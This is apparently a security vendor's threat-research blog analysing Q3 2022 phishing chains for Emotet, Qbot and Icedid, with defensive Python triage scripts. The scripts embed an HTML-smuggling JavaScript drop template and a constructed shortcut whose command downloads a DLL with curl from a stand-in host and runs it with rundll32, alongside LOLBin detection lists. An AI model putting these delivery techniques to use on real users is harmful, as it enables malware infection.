FortiGuard Labs Threat Research
Entering the second half of 2022, phishing campaigns continue to be the top threat targeting organizations, using a variety of techniques to infect users. Following our observations posted last quarter, FortiGuard Labs has continued to track many malware families, including Emotet, Qbot, and Icedid. We continue to find phishing emails delivering malware through Microsoft Excel files, Microsoft Word documents, Windows shortcut (LNK) files, and ISO disk image files.
To help organizations better identify and prevent phishing attacks and infections, this blog provides some of the most common details and techniques used by these malicious files for malware deployment.
Affected Platforms: Microsoft Windows
Impacted Users: Windows users
Impact: Controls victim's devices, collects sensitive information, and delivers other malware
Severity Level: Critical
Phishing emails combined with social engineering continue to be the most common malware campaign strategy. Similar to previous quarters, the phishing emails we have tracked in Q3 of 2022 include a malicious file attachment or a link to a malicious site that downloads a malicious file. We have also observed a technique known as HTML Smuggling, an evasive delivery technique in which the HTML page carries the payload inside itself as an encoded string and uses browser-side script to reconstruct it locally, in this case as a password-protected ZIP file saved to the victim's device. The HTML file can arrive as an attachment or be reached through a link. Either way it opens in the browser, and the browser itself produces the malicious file or files, so no separate download of the payload crosses the network.
Figure 1 shows an HTML Smuggling file attached to an email. Once opened, a password-protected ZIP file is dropped, and the password in the email is required to unzip it.
Figure 2 showcases another HTML Smuggling attachment. It is disguised as an Adobe PDF document download page and uses a simple lure to get its victim to open the local downloaded file. The password to unzip the downloaded ZIP file is displayed on the page instead of in the body of the email.
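The following script is an added example, not FortiGuard code, of how to triage an HTML Smuggling attachment offline: it looks for the browser download primitives the page needs (atob, Blob, createObjectURL, msSaveOrOpenBlob, the download attribute), locates the embedded base64 literal, decodes it, and identifies the dropped file by its magic bytes, descending one level into a ZIP. The HTML below is constructed for the example; the archive inside it is built in memory and is not password-protected, unlike the ones in the campaign.

```python
"""Offline triage of an HTML Smuggling page. Added example, not FortiGuard code;
the sample HTML and the ZIP it carries are constructed here."""
import base64
import io
import re
import zipfile

# JavaScript primitives that turn an in-page byte string into a local file
SMUGGLING_APIS = ("atob(", "new Blob(", "createObjectURL(", "msSaveOrOpenBlob(",
                  "msSaveBlob(", ".download =", "download=")
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{100,}={0,2})['\"]")   # long quoted base64 literal

MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"%PDF": "pdf", b"\x7fELF": "elf",
         b"Rar!": "rar", b"7z\xbc\xaf": "7z"}


def identify(blob: bytes) -> str:
    """File type from leading magic bytes; ISO 9660 is recognised by its volume descriptor."""
    for sig, name in MAGIC.items():
        if blob.startswith(sig):
            return name
    if blob[0x8001:0x8006] == b"CD001":
        return "iso"
    return "unknown"


def zip_members(blob: bytes) -> list:
    """(name, type) for each member of an in-memory, unencrypted ZIP."""
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        return [(info.filename, identify(z.read(info))) for info in z.infolist()]


def triage_html(html: str) -> dict:
    """Report smuggling APIs used and every decodable embedded payload."""
    apis = [a for a in SMUGGLING_APIS if a in html]
    payloads = []
    for m in B64_RE.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:            # not really base64, or bad padding
            continue
        entry = {"type": identify(raw), "size": len(raw), "data": raw}
        if entry["type"] == "zip":
            entry["members"] = zip_members(raw)
        payloads.append(entry)
    return {"apis": apis, "payloads": payloads,
            "smuggling": len(apis) >= 2 and any(p["type"] != "unknown" for p in payloads)}


def build_sample_html() -> str:
    """Constructed lure: password shown on the page, ZIP (holding a fake ISO) dropped by script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice.iso", b"\x00" * 0x8001 + b"CD001" + b"\x00" * 64)   # fake ISO header
    b64 = base64.b64encode(buf.getvalue()).decode()
    return f"""<html><body><p>Your document is protected. Password: 1234</p>
<script>
var d = atob('{b64}');
var a = new Uint8Array(d.length);
for (var i = 0; i < d.length; i++) a[i] = d.charCodeAt(i);
var blob = new Blob([a], {{type: 'application/octet-stream'}});
if (window.navigator.msSaveOrOpenBlob) {{ window.navigator.msSaveOrOpenBlob(blob, 'invoice.zip'); }}
else {{ var l = document.createElement('a'); l.href = window.URL.createObjectURL(blob);
l.download = 'invoice.zip'; document.body.appendChild(l); l.click(); }}
</script></body></html>"""
```

Run `triage_html(build_sample_html())` to see the chain HTML, then ZIP, then ISO reported without the page ever touching a browser. Real samples often split or reverse the base64 string, or decrypt it with a key stored elsewhere in the page, so a miss from the regex does not clear the file; the presence of two or more of the download primitives in an email attachment is already worth a look.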
Three samples we captured between July and September of 2022 were active in malware campaigns and provide good examples of what we have been observing. Some of the techniques are familiar, some are new, and others are older attacks with a new twist. The first is an Excel file with Excel 4.0 macros that uses the same macros and behaviors as a sample we described in our Q2 update. The second is new: a Word document with VBA macros. The third is an ISO file of the kind we disclosed in our Q2 blog, but this time with changes to the included files and the techniques used.
Emotet campaigns containing malicious Excel attachments have been observed since November 2021. The appearance of the Excel files and the malware payloads is constantly changing to evade detection. We captured this latest sample in July. As the analysis in our previous blog shows, this sample uses macros to download and execute the malware payloads.
Figure 3 shows an Excel 4.0 macro sheet, "Sheet 7," which includes a malicious formula. Cell F2 in this macro sheet carries the defined name "Auto_Open", so Excel runs the formula automatically once the file is opened and macros are enabled. The formula then writes further formulas into other cells and executes them. Finally, the "URLDownloadToFileA" API is called to download the malware files, and "regsvr32.exe" is used to execute the downloaded payloads.
This second sample is a Word document using VBA macros to drop an Icedid malware DLL file. Figure 4 shows a screenshot of this opened Word document. It displays a blurred document image behind an Italian language request for the victim to click the "Enable Content" button in the security warning bar.
The VBA code shown in Figure 5 is a function that reads its text from a custom XML part, "customXml/item1.xml", inside the document package. The retrieved text is a long hex string starting with "4d5a", the ASCII bytes "MZ" that begin every PE file, so the part holds a hex-encoded executable. Figure 6 shows the "Document_Open()" function. It converts the hex text to a byte array and writes it to a file called "c:\ProgramData\xxx.dll" once the Word document is opened. Next, "rundll32.exe" is called to load this malicious DLL file.
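An added example, not FortiGuard code, of checking a .docx for this hiding place without opening it in Word: the script treats the document as the ZIP package it is, scans every part under customXml/ for long runs of hex pairs, decodes them, and accepts only blobs whose MZ header points at a valid "PE\0\0" signature. The document is built in memory, and a 128-byte stub stands in for the real DLL; the part name customXml/item1.xml comes from the sample above.

```python
"""Find hex-encoded PE payloads stashed in a Word document's customXml parts.
Added example, not FortiGuard code; the .docx and the PE stub are constructed here."""
import io
import re
import struct
import zipfile

HEX_RUN = re.compile(r"(?:[0-9a-fA-F]{2}){64,}")   # at least 64 hex byte pairs in a row


def looks_like_pe(blob: bytes) -> bool:
    """MZ header whose e_lfanew (offset 0x3C) points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_embedded_pe(docx: bytes) -> list:
    """Return (part name, decoded bytes) for every hex-encoded PE under customXml/."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for name in z.namelist():
            if not name.startswith("customXml/"):
                continue
            text = z.read(name).decode("utf-8", "replace")
            for m in HEX_RUN.finditer(text):
                blob = bytes.fromhex(m.group(0))
                if looks_like_pe(blob):
                    found.append((name, blob))
    return found


def fake_pe_stub() -> bytes:
    """Constructed MZ/PE header only; this is not an executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after the DOS header
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 60


def build_sample_docx() -> bytes:
    """Minimal document package with the payload hex-encoded in customXml/item1.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("customXml/item1.xml", f"<root>{fake_pe_stub().hex()}</root>")
    return buf.getvalue()
```

The same check applies to .docm, .xlsm and .pptm packages, since all of them are ZIP containers with the same customXml layout. Samples that reverse the hex string, split it across several XML nodes or store it in document properties instead will not match the regex; the PE header test, not the regex, is the part to keep when adapting the scan.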
ISO files became a popular vehicle for malware deployment this summer. The malware families involved were Qbot, Icedid, and Bumblebee. We captured several malicious ISO files containing different files, as described below.
The contents of this ISO file are shown in Figure 7: a PNG file and an LNK file disguised with an image icon. The target of the LNK file is a command line that first opens the image file as a decoy and then uses "curl.exe" to download a malware DLL file and "rundll32.exe" to execute it.
This ISO file contains an LNK file and a folder named "one", which holds a BAT file, a JS file, a TXT file, and an empty folder. This sample chains multiple script files to obscure the execution of the malware DLL. As shown in Figure 9, the LNK file executes "alsoThing.bat" from the folder "one". The BAT file then runs "weTo.js" with four arguments. Finally, the JS file calls "rundll32.exe" on "thenTake.txt", which is actually the malware DLL with a .txt extension.
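In both ISO samples above the user-facing trigger is a shortcut, so the command line it carries is the first thing to pull out during triage. The parser below is an added example, not FortiGuard code: it reads the Shell Link header, skips the LinkTargetIDList and LinkInfo structures, decodes the StringData fields (relative path, working directory, arguments, icon location) and flags the living-off-the-land binaries they reference. The sample LNK is constructed with struct; its paths, the example.invalid URL and the "#1" export ordinal passed to rundll32 are invented for the example.

```python
"""Recover the command line from a .lnk file and flag LOLBins in it.
Added example, not FortiGuard code; the sample shortcut is constructed below."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORKING_DIR, HAS_ARGS, HAS_ICON = 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80

# Binaries seen as LNK targets or in LNK arguments in the chains described in this post
LOLBINS = ("cmd.exe", "curl.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "mshta.exe", "powershell")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus the StringData fields (name, paths, arguments, icon)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 76 or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:                                  # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                                # skip LinkInfo (size includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags}
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]       # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return out


def suspicious_indicators(link: dict) -> list:
    """LOLBins invoked by the shortcut, plus a flag when such a launcher borrows an icon."""
    haystack = " ".join(link.get(k, "") for k in ("relative_path", "arguments")).lower()
    hits = [b for b in LOLBINS if b in haystack]
    if hits and link.get("icon_location"):
        hits.append("icon-masquerade")
    return hits


def build_sample_lnk() -> bytes:
    """Constructed shortcut modelled on the image-icon LNK from the first ISO (not a real sample)."""
    flags = HAS_ID_LIST | HAS_REL_PATH | HAS_WORKING_DIR | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 76, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)      # SW_SHOWNORMAL, rest zero
    body = struct.pack("<H", 2) + b"\x00\x00"                  # IDList holding only the TerminalID
    for s in ("..\\..\\..\\Windows\\System32\\cmd.exe",
              "C:\\Windows\\System32",
              "/c start photo.png && curl.exe -o %TEMP%\\p.dll https://example.invalid/p.png "
              "&& rundll32.exe %TEMP%\\p.dll,#1",
              "C:\\Windows\\System32\\imageres.dll"):         # borrowed picture icon
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body
```

Two caveats when running this over real shortcuts: the parser skips the IDList, so a shortcut whose target lives only there (no relative path) will show arguments but no binary name, and malicious LNKs frequently pad the arguments with hundreds of spaces so the command scrolls out of view in the Properties dialog, which is exactly why reading the raw field is preferable to looking at it in Explorer.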
This ISO file contains a CHM (Compiled HTML Help) file and a DLL file, as shown in Figure 10. A script snippet is appended to the end of the CHM file. When the CHM is opened, the help viewer executes the script, which uses "rundll32.exe" to launch the malicious "app.dll".
Figure 11 shows an ISO file that contains an LNK file and three hidden files ("WindowsCodecs.dll", "102755.dll", and "calc.exe"). First, the LNK file runs "calc.exe", a legitimate Windows binary. On startup, "calc.exe" loads several dependencies, including a library named "WindowsCodecs.dll". As you can see, one of the filenames in this ISO file is the same.
It then abuses a technique called DLL search order hijacking. When an application loads a DLL without specifying a full path, Windows walks a fixed search order to locate it, and the directory containing the application is searched before the system directory. Only the libraries on the KnownDLLs list are exempt, as those are always mapped from System32.
In this case, the "WindowsCodecs.dll" in the ISO file sits in the same folder as the executable, so the loader picks it up instead of the legitimate copy in the Windows system directory. This loaded library is a malicious stand-in that creates a process to execute the malware "102755.dll", as shown in Figure 12.
Figure 13 shows the process tree in which "calc.exe" loads the malicious "WindowsCodecs.dll" from the ISO file and then spawns "regsvr32.exe" with the command line "C:\Windows\SysWOW64\regsvr32.exe 102755.dll". The SysWOW64 path indicates that the bundled "calc.exe" is a 32-bit binary, so the hijacked DLL and the payload are 32-bit as well.
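The following simulation is an added example, not FortiGuard code, of why the hijack in Figure 12 works for WindowsCodecs.dll but would not work for kernel32.dll: it models the loader's search order with SafeDllSearchMode on (application directory, System32, Windows directory, current directory, PATH; the 16-bit system directory and already-loaded modules are left out) and honours the KnownDLLs exemption. The directory layout is built with tempfile, the KnownDLLs set is an illustrative subset of the real registry list, and the import list attributed to calc.exe is assumed for the demo.

```python
"""Simulate Windows DLL resolution to list imports a co-located file would hijack.
Added example, not FortiGuard code; directories, KnownDLLs subset and imports are constructed."""
import os
import tempfile

# Illustrative subset of HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "gdi32.dll", "advapi32.dll", "ole32.dll"}


def _find_in(directory: str, name: str):
    """Case-insensitive lookup of a file name inside one directory (NTFS is case-insensitive)."""
    try:
        for entry in os.listdir(directory):
            if entry.lower() == name:
                return os.path.join(directory, entry)
    except FileNotFoundError:
        pass
    return None


def resolve_dll(name, app_dir, system32, windows_dir, cwd, path_dirs):
    """Path the loader picks for an import given without a full path (SafeDllSearchMode on)."""
    name = name.lower()
    if name in KNOWN_DLLS:                     # KnownDLLs are always mapped from System32
        return _find_in(system32, name) or os.path.join(system32, name)
    # 1. application directory, 2. System32, 3. Windows directory, 4. cwd, 5. PATH
    for directory in [app_dir, system32, windows_dir, cwd, *path_dirs]:
        hit = _find_in(directory, name)
        if hit:
            return hit
    return None


def hijack_candidates(app_dir, imports, system32, windows_dir, cwd, path_dirs):
    """Imports that would resolve to a file outside the Windows system directories."""
    trusted = (os.path.normcase(system32), os.path.normcase(windows_dir))
    out = []
    for dll in imports:
        chosen = resolve_dll(dll, app_dir, system32, windows_dir, cwd, path_dirs)
        if chosen and not os.path.normcase(chosen).startswith(trusted):
            out.append((dll, chosen))
    return out


def demo():
    """Fake System32 plus a fake mounted ISO laid out like the one in Figure 11."""
    root = tempfile.mkdtemp()
    windows_dir = os.path.join(root, "Windows")
    system32 = os.path.join(windows_dir, "System32")
    iso = os.path.join(root, "E")                      # stands in for the mounted drive letter
    os.makedirs(system32)
    os.makedirs(iso)
    for n in ("WindowsCodecs.dll", "kernel32.dll", "calc.exe"):
        open(os.path.join(system32, n), "wb").close()  # legitimate copies
    for n in ("calc.exe", "WindowsCodecs.dll", "102755.dll", "kernel32.dll"):
        open(os.path.join(iso, n), "wb").close()       # attacker's copies riding in the ISO
    imports = ["kernel32.dll", "WindowsCodecs.dll"]    # assumed subset of calc.exe's imports
    return hijack_candidates(iso, imports, system32, windows_dir, iso, [])
```

`demo()` returns only WindowsCodecs.dll: the kernel32.dll dropped next to calc.exe is ignored because the loader never consults the application directory for a KnownDLL. The practical check on a real mount is the same set intersection, the DLL names next to an unexpected copy of a Windows binary against the DLL names that binary imports, and a hit on anything outside KnownDLLs deserves a closer look.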
To provide an overview of malware delivery, we have illustrated the execution flow of each chain. Below is the delivery chain for each malware family: Emotet, Qbot, and Icedid.
All deliveries start with a phishing email that carries a malicious attachment or a download link. Emotet uses an Excel file as a downloader that fetches the Emotet payload and then executes it.
Figure 15 shows the Qbot installation chain. The malicious ISO file is either extracted from an HTML Smuggling file or downloaded from a malicious link. The files contained in the ISO vary and lead to different execution paths, but each is triggered by the user double-clicking an LNK file inside the ISO. The following steps can include a download, obfuscated scripts, or DLL search order hijacking. Ultimately, the Qbot payload runs by any of these routes.
As shown in Figure 16, the execution chains of Icedid and Qbot are similar, with the ISO file playing an essential role in both. The difference is a novel use of a CHM file to run the Icedid payload. In addition, a malicious Word document attachment is used to drop and execute the payload directly.
Over the past three months, we have seen a significant reduction in malware campaigns compared to the first half of the year. Since we discovered an Emotet campaign in mid-July, no further Emotet activity has been observed. Qbot activity also stopped in mid-July before resuming in September. And while Icedid distribution has been continuous, it has been less frequent.
According to our recent observations, the most active files for malware delivery are disk image files like the ISO files described in this report. A downloaded ISO carries the Mark-of-the-Web, but the files inside it do not inherit the mark when the image is mounted, so the trust controls keyed on that mark are bypassed and the payload runs with fewer warnings and less scrutiny. Moreover, ISO files can be mounted and opened on modern versions of Windows with just a double click. In addition to the ISO files described above, organizations are cautioned to watch for other disk image formats, such as IMG and VHD files, which can also be used to deliver malware.
The HTML Smuggling technique is used to bypass restrictions on receiving files from the Internet by creating the file locally in the browser. LNK and CHM files serve as the execution triggers because both launch with a simple double-click.
At the same time, Microsoft Office files with macros continue to be distributed, though usually in small numbers. Interestingly, threat actors do not appear to have stopped working on Word documents and Excel files despite Microsoft adding more restrictions on the use of macros.
Although malware distribution is constantly changing, with new updates and techniques regularly being added, all the attacks we have observed started with phishing emails. As a result, it is vital to raise awareness of social engineering, including training end users, to avoid these threats.
Fortinet customers are protected from the malware described in this report by FortiGuard’s Web Filtering, AntiVirus, FortiMail, FortiClient, FortiEDR, and Content Disarm & Reconstruction (CDR) services as follows.
The FortiGuard CDR service disarms the phishing emails with their attached malicious files.
FortiEDR detects the involved files as malicious based on their behavior.
Fortinet customers are protected from these malicious files and malware by FortiGuard Antivirus, which is included in FortiMail. FortiMail also detects phishing emails and can block or disarm attachments.
All malicious samples described in this report are detected by FortiGuard AntiVirus as follows:
The malware payloads are detected by FortiGuard AntiVirus as follows:
Fortinet’s Digital Risk Protection Service, FortiRecon, continually monitors for credentials stolen using Stealers (such as Redline) being sold by threat actors on the dark web that can be used to breach a network. Request a test drive to see how FortiRecon can provide an early warning of imminent threats to your network and data.
In addition, Fortinet has multiple solutions designed to train users on how to understand and detect phishing threats:
Our turnkey Security Awareness Training SaaS service helps organizations deliver regular, timely training on cybersecurity threats such as phishing to their end-users.
The FortiPhish Phishing Simulation Service provides additional, ongoing training by using real-world simulations to help organizations test user awareness and vigilance to phishing threats and train and reinforce proper practices when users encounter targeted phishing attacks.
We also suggest that organizations have their end users undergo our FREE NSE training: NSE 1 – Information Security Awareness that includes a module on Internet safety and phishing.
Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.